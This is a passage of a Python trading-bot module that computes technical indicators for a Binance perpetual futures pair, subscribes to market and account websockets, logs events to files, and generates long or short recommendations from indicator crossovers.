return np.array([macd, macdsignal, macdhist])
def calculate_rsi(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# rsi_1 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi1'])
# rsi_2 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi2'])
# rsi_3 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi3'])
'''
res_task_1 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi1']))
res_task_2 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi2']))
res_task_3 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi3']))
res_task_1.start()
res_task_2.start()
res_task_3.start()
res_task_1.join()
res_task_2.join()
res_task_3.join()
res1 = res_task_1.get_result()
res2 = res_task_2.get_result()
res3 = res_task_3.get_result()
return np.array([res1, res2, res3])
def calculate_emv(open_list, high_list, low_list, close_list, volume_list, indicator_config):
try:
length = indicator_config['emv']['length']
divisor = indicator_config['emv']['divisor']
ohlcv = OHLCVFactory.from_matrix2(
[
open_list,
high_list,
low_list,
close_list,
volume_list
]
)
EMV_list = np.array(talippIndicator.EMV(length, divisor, ohlcv))
return EMV_list
except Exception as e:
print("Error calculating EMV: ", e)
return None
def get_indicators(kline_dict, indicator_config):
open_price_list = np.array(kline_dict['open_price_list']).astype(float)
high_price_list = np.array(kline_dict['high_price_list'])
low_price_list = np.array(kline_dict['low_price_list'])
close_price_list = np.array(kline_dict['close_price_list']).astype(float)
volume_list = np.array(kline_dict['volume_list']).astype(float)
MACD_task = MyThread(calculate_macd, args=(close_price_list, indicator_config))
EMA_task = MyThread(calculate_ema, args=(close_price_list, indicator_config))
RSI_task = MyThread(calculate_rsi, args=(close_price_list, indicator_config))
EMV_task = MyThread(calculate_emv, args=(open_price_list, high_price_list, low_price_list, close_price_list, volume_list, indicator_config))
# indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
for task in indicator_task_list:
task.start()
for task in indicator_task_list:
task.join()
MACD_result = MACD_task.get_result()
EMA_result = EMA_task.get_result()
RSI_result = RSI_task.get_result()
EMV_result = EMV_task.get_result()
return MACD_result, EMA_result, RSI_result, EMV_result
def current_date_time():
return '{}({})'.format(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), (str(time.tzname[-1])))
def current_utc_time():
return time.time()
def convert_object_to_string(object):
object_dict = (object.__dict__)
string = '====================================================================\n'
for key in object_dict.keys():
string += '{}: {}\n'.format(key, object_dict[key])
return string
def put_to_log(content, path):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
f=open(path, "a+")
f.write(content)
f.close()
except Exception as e:
print("Logging for {} failed: {}".format(content, e))
class MyThread(threading.Thread):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
'''
def __init__(self, func, args):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
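# --- Illustrative usage (not part of the original module) ---
# MyThread wraps a function call in a thread and keeps its return value, which is
# how the indicator helpers above run several TA-Lib calls in parallel. A minimal
# example with a plain built-in instead of ta.EMA:
_demo_task = MyThread(sum, args=([1, 2, 3],))
_demo_task.start()
_demo_task.join()
assert _demo_task.get_result() == 6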
class fastTrade:
def __init__(self, config):
self.__paried_symbol = config['paried_symbol']
self.__asset_symbol = config['asset_symbol']
self.__starting_asset_value = config['starting_asset_value']
self.__api_key = config['api_key']
self.__api_secret = config['api_secret']
self.__interval = config['interval']
self.__leverage = config['leverage']
self.__initial_data_num = config['initial_data_num']
self.__acc_profit = 0
self.__price_anneal = config['price_anneal']
self.__order_timeout = config['order_timeout']
self.__first_order = True
self.indicator_config = config['indicator_config']
self.__recommendation_log_path = None
self.__order_log_path = None
self.__error_log_path = None
self.__position_log_path = None
self.__profit_log_path = None
self.__comission_rate = 0.0002 + 0.0004 + 0.0002
self.__latest_data_update_timestamp = 0
self.__latest_data_analysis_timestamp = 0
self.__latest_depth_update_timestamp = 0
self.order_update_list = []
self.account_update_list = []
self.depth_object = None
self.margin = '===================================================================='
self.target_profit_dict = config['target_profit']
self.__stop_loss_ratio = config['stop_loss_ratio']
self.__level_1_target_proofit = self.target_profit_dict['level1']
self.__level_2_target_proofit = self.target_profit_dict['level2']
self.__level_3_target_proofit = self.target_profit_dict['level3']
self.indicator_dict = dict()
# Maps a unique order id to its closed-position record, e.g.
# 'uniqueOrderId': {
#     'side': 'SIDE',
#     'entryPrice': -99999,
#     'exitPrice': -99999,
#     'quantity': 0,
#     'relatedOrderID': {}
# }
self.finished_position_dict = {}
self.current_position_dict = {}
'''
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
...
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
# Need to be updated automatically
self.client = None
self.request_client = None
self.listen_key = None
self.exchange_info = None
self.paired_asset_info = None
self.account_info = None
self.sub_client = None
self.kline_info = {
'kline_list': {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
},
'updated_time': 0
}
'''
"pricePrecision": 5, // 价格小数点位数
"quantityPrecision": 0, // 数量小数点位数
"baseAssetPrecision": 8, // 标的资产精度
"quotePrecision": 8, // 报价资产精度
'''
self.__pricePrecision = None
self.__quantityPrecision = None
self.__baseAssetPrecision = None
self.__quotePrecision = None
# self.__asset_balance = 0
# self.__remaining = 0
def update_config_info(self):
if self.sub_client != None:
self.sub_client.unsubscribe_all()
self.update_listen_key()
self.update_client()
self.update_exchange_info()
self.update_account_info()
self.get_historical_kline()
print('========== Succeeded updating trading config ==========')
def make_dir(self):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
current_time = current_utc_time()
folder_name = str(int(current_time))
folder_path = 'logs/' + self.__paried_symbol + '/' + folder_name
self.__recommendation_log_path = folder_path + "/recommendation.txt"
self.__order_log_path = folder_path + "/order.txt"
self.__error_log_path = folder_path + "/error.txt"
self.__position_log_path = folder_path + "/position.txt"
self.__profit_log_path = folder_path + "/profit.txt"
if not os.path.exists('logs'):
os.mkdir('logs')
if not os.path.exists('logs/' + self.__paried_symbol):
os.mkdir('logs/' + self.__paried_symbol)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
current_datetime = utc_2_datetime(current_time)
recommendation_logs = open(self.__recommendation_log_path,"w+")
recommendation_logs.write("This recommendation log was created at UTC: {}({}).\n".format(current_time, current_datetime))
recommendation_logs.close()
order_logs = open(self.__order_log_path,"w+")
order_logs.write("This order log was created at UTC: {}({}).\n".format(current_time, current_datetime))
order_logs.close()
error_logs = open(self.__error_log_path, "w+")
error_logs.write("This error log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__position_log_path, "w+")
error_logs.write("This position log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__profit_log_path, "w+")
error_logs.write("This profit log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
except Exception as e:
print("An error occurs while making log directory: ", e)
return False
else:
return True
def update_parired_asset_info(self):
"""
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
https://www.w3schools.com/python/ref_func_hasattr.asp
"""
for item in self.exchange_info.symbols:
# PrintMix.print_data(item)
if ((hasattr(item, 'contractType')) and (hasattr(item, 'symbol')) and (hasattr(item, 'pair'))):
if ((item.pair == self.__paried_symbol) and (item.symbol == self.__paried_symbol) and (item.contractType == "PERPETUAL")):
# PrintMix.print_data(item)
self.paired_asset_info = item
self.__pricePrecision = item.pricePrecision
self.__quantityPrecision = item.quantityPrecision
self.__baseAssetPrecision = item.baseAssetPrecision
self.__quotePrecision = item.quotePrecision
break
if self.paired_asset_info == None:
raise Exception('\nInvalid symbol: {}\n'.format(self.__paried_symbol))
print('\n========== Succeeded updating paired asset info ==========\n')
def update_exchange_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
'''
result = self.request_client.get_exchange_information()
self.exchange_info = result
if self.exchange_info == None:
raise Exception('\nFailed updating exchange info\n')
print('========== Succeeded updating exchange info ==========')
def update_client(self):
client = Client(self.__api_key, self.__api_secret)
self.client = client
if self.client == None:
raise Exception('\nFailed updating client\n')
print('========== Succeeded updating client ==========')
def update_listen_key(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream-
'''
request_client = RequestClient(api_key=self.__api_key, secret_key=self.__api_secret)
listen_key = request_client.start_user_data_stream()
self.request_client = request_client
self.listen_key = listen_key
self.update_sub_client()
print('========== Succeeded updating listen key ==========')
def extend_listen_key(self):
'''
Keep user data stream
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream2
'''
result = self.request_client.keep_user_data_stream()
print("Trying to reconnect...\nResult: ", result)
def update_account_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#v2-user_data-2
'''
result = self.request_client.get_account_information_v2()
self.account_info = result
if self.account_info == None:
raise Exception('\nFailed updating account info\n')
print('========== Succeeded updating account info ==========')
def update_sub_client(self):
sub_client = SubscriptionClient(api_key=g_api_key, secret_key=g_secret_key)
self.sub_client = sub_client
if self.sub_client == None:
raise Exception('\nFailed updating subscription client\n')
print('========== Succeeded updating subscription client ==========')
def subscribe_book_depth_event(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/example/websocket/subscribebookdepth.py
https://binance-docs.github.io/apidocs/futures/cn/#6ae7c2b506
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
def callback(data_type: 'SubscribeMessageType', event: 'any'):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderbookevent.py
'''
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.depth_object = event
self.__latest_depth_update_timestamp = event.transactionTime
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("transaction time: ", event.transactionTime)
# print("Symbol: ", event.symbol)
# print("first update Id from last stream: ", event.firstUpdateId)
# print("last update Id from last stream: ", event.lastUpdateId)
# print("last update Id in last stream: ", event.lastUpdateIdInlastStream)
# print("=== Bids ===")
# PrintMix.print_data(event.bids)
# print("===================")
# print("=== Asks ===")
# PrintMix.print_data(event.asks)
# print("===================")
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
print(e.error_code + e.error_message)
log = "\n\n{}\nBook depth subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
# Valid limit values are 5, 10, or 20
self.sub_client.subscribe_book_depth_event(self.__paried_symbol.lower(), 20, callback, error, update_time=UpdateTime.FAST)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error, update_time=UpdateTime.NORMAL)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error)
def subscribe_user_data_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#balance-position
https://binance-docs.github.io/apidocs/futures/cn/#060a012f0b
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/accountupdate.py
'''
logger = logging.getLogger("binance-client")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
if (event.eventType == "ACCOUNT_UPDATE"):
for item in event.positions:
if (item.symbol == self.__paried_symbol):
self.account_update_list.append(event)
put_to_log('\n\nPosition updated: {}\n{}\n'.format(current_date_time(), convert_object_to_string(item)), self.__position_log_path)
# print('\n\n\n------------------')
# print('Position amount')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction time: ", event.transactionTime)
# print('------------------')
# print("=== Balances ===")
# PrintMix.print_data(event.balances)
# print("================")
# print("=== Positions ===")
# PrintMix.print_data(event.positions)
# print("================")
elif(event.eventType == "ORDER_TRADE_UPDATE"):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
NEW
PARTIAL_FILL (partially filled)
FILL (filled)
CANCELED (canceled)
CALCULATED
EXPIRED (order expired)
TRADE (trade)
'''
if event.symbol == self.__paried_symbol:
self.order_update_list.append(event)
# print('------------------')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction Time: ", event.transactionTime)
# print('------------------\n\n\n')
# print("Symbol: ", event.symbol)
# print("Client Order Id: ", event.clientOrderId)
# print("Side: ", event.side)
# print("Order Type: ", event.type)
# print("Time in Force: ", event.timeInForce)
# print("Original Quantity: ", event.origQty)
# print("Position Side: ", event.positionSide)
# print("Price: ", event.price)
# print("Average Price: ", event.avgPrice)
# print("Stop Price: ", event.stopPrice)
# print("Execution Type: ", event.executionType)
# print("Order Status: ", event.orderStatus)
# print("Order Id: ", event.orderId)
# print("Order Last Filled Quantity: ", event.lastFilledQty)
# print("Order Filled Accumulated Quantity: ", event.cumulativeFilledQty)
# print("Last Filled Price: ", event.lastFilledPrice)
# print("Commission Asset: ", event.commissionAsset)
# print("Commissions: ", event.commissionAmount)
# print("Order Trade Time: ", event.orderTradeTime)
# print("Trade Id: ", event.tradeID)
# print("Bids Notional: ", event.bidsNotional)
# print("Ask Notional: ", event.asksNotional)
# print("Is this trade the maker side?: ", event.isMarkerSide)
# print("Is this reduce only: ", event.isReduceOnly)
# print("stop price working type: ", event.workingType)
# print("Is this Close-All: ", event.isClosePosition)
# if not event.activationPrice is None:
# print("Activation Price for Trailing Stop: ", event.activationPrice)
# if not event.callbackRate is None:
# print("Callback Rate for Trailing Stop: ", event.callbackRate)
elif(event.eventType == "listenKeyExpired"):
print("\nEvent: ", event.eventType)
print("Event time: ", event.eventTime)
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
self.extend_listen_key()
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nUser data subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_user_data_event(self.listen_key, callback, error)
def subscribe_candlestick_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
or
https://binance-docs.github.io/apidocs/futures/cn/#k-5
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.update_historical_kline(event)
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Symbol: ", event.symbol)
# print("Data:")
# PrintBasic.print_obj(event.data)
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nCandlestick subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_candlestick_event(self.__paried_symbol.lower(), self.__interval, callback, error)
def update_historical_kline(self, event):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
event:
Event type: kline
Event time: 1609506873291
Symbol: BLZUSDT
Data:
close:0.06756
closeTime:1609506899999
firstTradeId:3634790
high:0.06758
ignore:0
interval:1m
isClosed:False
json_parse:<function Candlestick.json_parse at 0x107909d30>
lastTradeId:3634796
low:0.06751
numTrades:7
open:0.06758
quoteAssetVolume:746.46888
startTime:1609506840000
symbol:BLZUSDT
takerBuyBaseAssetVolume:0.0
takerBuyQuoteAssetVolume:0.0
volume:11054.0
'''
try:
startTime = event.data.startTime
isClosed = event.data.isClosed
if ( (not isClosed) and ( (startTime - self.kline_info['updated_time']) < 60000 ) ):
kline_info = self.kline_info.copy()
kline_object = event.data
kline_info['kline_list']['open_price_list'][-1] = float(kline_object.open) # o
kline_info['kline_list']['high_price_list'][-1] = float(kline_object.high) # h
kline_info['kline_list']['low_price_list'][-1] = float(kline_object.low) # l
kline_info['kline_list']['close_price_list'][-1] = float(kline_object.close) # c
kline_info['kline_list']['quoteAssetVolume_list'][-1] = float(kline_object.quoteAssetVolume) # vol(quoAsset)
kline_info['kline_list']['volume_list'][-1] = float(kline_object.volume) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1] = float(kline_object.takerBuyBaseAssetVolume) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1] = float(kline_object.takerBuyQuoteAssetVolume) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'][-1] = int(kline_object.numTrades) # numTrades
self.kline_info = kline_info
else:
self.get_historical_kline()
self.__latest_data_update_timestamp = event.eventTime
except Exception as e:
log = "\n\n{}\nAn ERROR happend while updating historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_historical_kline(self):
'''
klines:
close:347.15
closeTime:1609496279999
high:347.75
ignore:0
json_parse:<function Candlestick.json_parse at 0x10c8b41f0>
low:347.06
numTrades:298
open:347.30
openTime:1609496220000
quoteAssetVolume:65901.36106
takerBuyBaseAssetVolume:111.498
takerBuyQuoteAssetVolume:38745.65489
volume:189.645
[
[
1499040000000, // open time
"0.01634790", // open price o
"0.80000000", // high price h
"0.01575800", // low price l
"0.01577100", // close price (latest price while the candle is still open) c
"148976.11427815", // volume
1499644799999, // close time
"2434.19055334", // quote asset volume
308, // number of trades
"1756.87402397", // taker buy base asset volume
"28.46694368", // taker buy quote asset volume
"17928899.62484339" // ignore this field
]
]
'''
try:
klines = self.request_client.get_candlestick_data(symbol=self.__paried_symbol, interval=self.__interval,limit=self.__initial_data_num)
# PrintBasic.print_obj(klines[-1])
last_n = klines[((-1) * self.__initial_data_num):]
kline_info = self.kline_info.copy()
kline_info['kline_list'] = {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
}
kline_info['updated_time'] = last_n[-1].openTime
for item in last_n:
kline_info['kline_list']['open_price_list'].append(float(item.open)) # o
kline_info['kline_list']['high_price_list'].append(float(item.high)) # h
kline_info['kline_list']['low_price_list'].append(float(item.low)) # l
kline_info['kline_list']['close_price_list'].append(float(item.close)) # c
kline_info['kline_list']['quoteAssetVolume_list'].append(float(item.quoteAssetVolume)) # vol(quoAsset)
kline_info['kline_list']['volume_list'].append(float(item.volume)) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'].append(float(item.takerBuyBaseAssetVolume)) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'].append(float(item.takerBuyQuoteAssetVolume)) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'].append(int(item.numTrades)) # numTrades
self.kline_info = kline_info
print('========== Succeeded getting historical data ==========')
# print(self.kline_info['kline_list']['close_price_list'])
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_subscribing(self):
try:
t1 = threading.Thread(target=self.subscribe_candlestick_event)
t2 = threading.Thread(target=self.subscribe_user_data_event)
# t3 = threading.Thread(target=self.subscribe_book_depth_event)
# subs_task_list = [t1, t2, t3]
subs_task_list = [t1, t2]
for task in subs_task_list:
task.start()
for task in subs_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happend while starting subscription: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_handler(self):
time.sleep(3)
try:
t1 = threading.Thread(target=self.order_handler)
t2 = threading.Thread(target=self.position_handler)
t3 = threading.Thread(target=self.position_status_handler)
handler_task_list = [t1, t2, t3]
for task in handler_task_list:
task.start()
for task in handler_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happend while starting the handler: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_recommendation(self, MACD_dict, EMA_dict, RSI_dict, EMV_list, kline_dict):
level = 0
side = None
try:
# Long
if ( ( EMA_dict['ema2'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] < EMA_dict['ema3'][-2] ) ):
side = 'long'
level = 3
return level, side
# Short
elif ( ( EMA_dict['ema2'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] > EMA_dict['ema3'][-2] ) ):
side = 'short'
level = 3
return level, side
# Long
elif ( ( EMV_list[-2] < 0 ) and ( EMV_list[-1] > 0 ) and ( RSI_dict['rsi1'][-1] > 30 ) and ( RSI_dict['rsi1'][-2] < 30 ) and ( RSI_dict['rsi2'][-1] > 30 ) and ( RSI_dict['rsi2'][-2] < 30 ) and ( RSI_dict['rsi3'][-1] > 30 ) and ( RSI_dict['rsi3'][-2] < 30 ) ):
side = 'long'
level = 2
return level, side
# Short
elif ( ( EMV_list[-2] > 0 ) and ( EMV_list[-1] < 0 ) and ( RSI_dict['rsi1'][-1] < 70 ) and ( RSI_dict['rsi1'][-2] > 70 ) and ( RSI_dict['rsi2'][-1] < 70 ) and ( RSI_dict['rsi2'][-2] > 70 ) and ( RSI_dict['rsi3'][-1] < 70 ) and ( RSI_dict['rsi3'][-2] > 70 ) ):
side = 'short'
level = 2
return level, side
# # Long
# elif ( ( ( EMA_dict['ema1'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] < EMA_dict['ema3'][-2] ) ) and ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) > 0 ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) - ( MACD_dict['macd'][-2] - MACD_dict['macdsignal'][-2] ) ) > 0 ) ):
# side = 'long'
# level = 1
# return level, side
# # Short
# elif ( ( ( EMA_dict['ema1'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] > EMA_dict['ema3'][-2] ) ) and ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) < 0 ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) - ( MACD_dict['macd'][-2] - MACD_dict['macdsignal'][-2] ) ) < 0 ) ):
# side = 'short'
# level = 1
# return level, side
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting recommendations: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
return level, side
else:
#Test
# side = ('long' if random.randint(1,2) == 1 else 'short')
# level = random.randint(1,2)
return level, side
def start_analysing(self):
while True:
try:
# print((self.current_recommendation['short']['updated_time']))
if ((current_utc_time() - (self.current_recommendation['short']['updated_time'])) > 0.5):
self.current_recommendation['short'] = {
'updated_time': 0,
'level': 0,
'price': None
}
if ((current_utc_time() - (self.current_recommendation['long']['updated_time'])) > 0.5):
self.current_recommendation['long'] = {
'updated_time': 0,
'level': 0,
'price': None
}
kline_info = self.kline_info
if (len(kline_info['kline_list']['close_price_list']) == self.__initial_data_num):
self.__latest_data_analysis_timestamp = self.__latest_data_update_timestamp
MACD, EMA, RSI, EMV = get_indicators(kline_info['kline_list'], self.indicator_config)
np_type = type(np.array([]))
if ((type(MACD) == np_type) and (type(EMA) == np_type) and (type(RSI) == np_type) and (type(EMV) == np_type)):
MACD_dict = {
'macd': np.round(MACD[0], decimals=4),
'macdsignal': np.round(MACD[1], decimals=4),
'macdhist': np.round(MACD[2], decimals=4)
}
EMA_dict = {
'ema1': np.round(EMA[0], decimals=3),
'ema2': np.round(EMA[1], decimals=3),
'ema3': np.round(EMA[2], decimals=3)
}
RSI_dict = {
'rsi1': np.round(RSI[0], decimals=3),
'rsi2': np.round(RSI[1], decimals=3),
'rsi3': np.round(RSI[2], decimals=3)
}
EMV_list = np.round(EMV, decimals=3)
self.indicator_dict = {
'MACD_dict': MACD_dict,
'EMA_dict': EMA_dict,
'RSI_dict': RSI_dict,
'EMV_list': EMV_list
}
latest_price = kline_info['kline_list']['close_price_list'][-1]
level, side = self.get_recommendation(MACD_dict, EMA_dict, RSI_dict, EMV_list, kline_info['kline_list'])
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': None,
'level': 0,
'price': None
}
}
'''
if level >= 0:
if (side == 'long' or side == 'short'):
self.current_recommendation[side]['level'] = level
self.current_recommendation[side]['price'] = latest_price
self.current_recommendation[side]['updated_time'] = current_utc_time()
temp_logs = '\n\n{}\nNew {} recommendation:\nLevel: {}\nPrice: {}\nDatetime: {}\nTimestamp: {}\n{}\n\n'.format(
self.margin,
side.upper(),
level,
latest_price,
utc_2_datetime(self.current_recommendation[side]['updated_time']),
self.current_recommendation[side]['updated_time'],
self.margin
)
# print(temp_logs)
put_to_log(temp_logs, self.__recommendation_log_path)
# print ("\r||(MACD - MACDSignal) = {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||EMA{}: {:.3f}||EMA{}: {:.3f}|| EMA{}: {:.3f}||Buy level: {}||Sell level: {}||Price: {:.2f}||Time: {}||".format
# (macd[-1] - macdsignal[-1],
# self.indicator_config['rsi']['rsi1'],
# rsi1[-1],
# self.indicator_config['rsi']['rsi2'],
# rsi2[-1],
# self.indicator_config['rsi']['rsi3'],
# rsi3[-1],
# self.indicator_config['ema']['ema1'],
# ema1[-1],
# self.indicator_config['ema']['ema2'],
# ema2[-1],
# self.indicator_config['ema']['ema3'],
# ema3[-1],
# buy_level,
# sell_level,
# float(np_price_list[-1]),
# current_date_time()
# ), end="")
except Exception as e:
log = "\n\n{}\nAn ERROR happend while analyzing market data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def check_if_service_avaliable(self):
'''
https://stackoverflow.com/questions/16755394/what-is-the-easiest-way-to-get-current-gmt-time-in-unix-timestamp-format
'''
time.sleep(3)
while True:
if len(self.current_position_dict) > 0:
string = "\r|" + current_date_time()
for clientID in self.current_position_dict.keys():
string += "|PositionSide: {} |Amount: {} |EntryPrice: {}|CurrentPrice: {} ROE: {:.3f}%| ".format(
self.current_position_dict[clientID]['positionSide'],
self.current_position_dict[clientID]['quantity'] if self.current_position_dict[clientID]['quantity']!= None else "NA",
self.current_position_dict[clientID]['entryPrice'] if self.current_position_dict[clientID]['entryPrice'] else "NA",
self.kline_info['kline_list']['close_price_list'][-1] if self.kline_info['kline_list']['close_price_list'][-1] != None else "NA",
(100*self.__leverage*(self.kline_info['kline_list']['close_price_list'][-1]/self.current_position_dict[clientID]['entryPrice']-1) * (-1 if self.current_position_dict[clientID]['positionSide'].lower() == 'short' else 1)) if ( self.current_position_dict[clientID]['entryPrice'] != None) else 0.00
)
print(string, end = "")
else:
kling_string = '|o:{:.2f}|h:{:.2f}|l:{:.2f}|c:{:.2f}|QuoVol:{:.2f}|BaseVol:{:.2f}|BuyBaseVol:{:.2f}|BuyQuoVol:{:.2f}|numTrades:{}|'.format(
self.kline_info['kline_list']['open_price_list'][-1],
self.kline_info['kline_list']['high_price_list'][-1],
self.kline_info['kline_list']['low_price_list'][-1],
self.kline_info['kline_list']['close_price_list'][-1],
self.kline_info['kline_list']['quoteAssetVolume_list'][-1],
self.kline_info['kline_list']['volume_list'][-1],
self.kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1],
self.kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1],
self.kline_info['kline_list']['numTrades_list'][-1]
)
recommendation_string = ' |LONG:L: {},P:{}|SHORT:L: {},P:{}|'.format(
self.current_recommendation['long']['level'],
self.current_recommendation['long']['price'],
self.current_recommendation['short']['level'],
self.current_recommendation['short']['price']
)
indicator_dict = self.indicator_dict.copy()
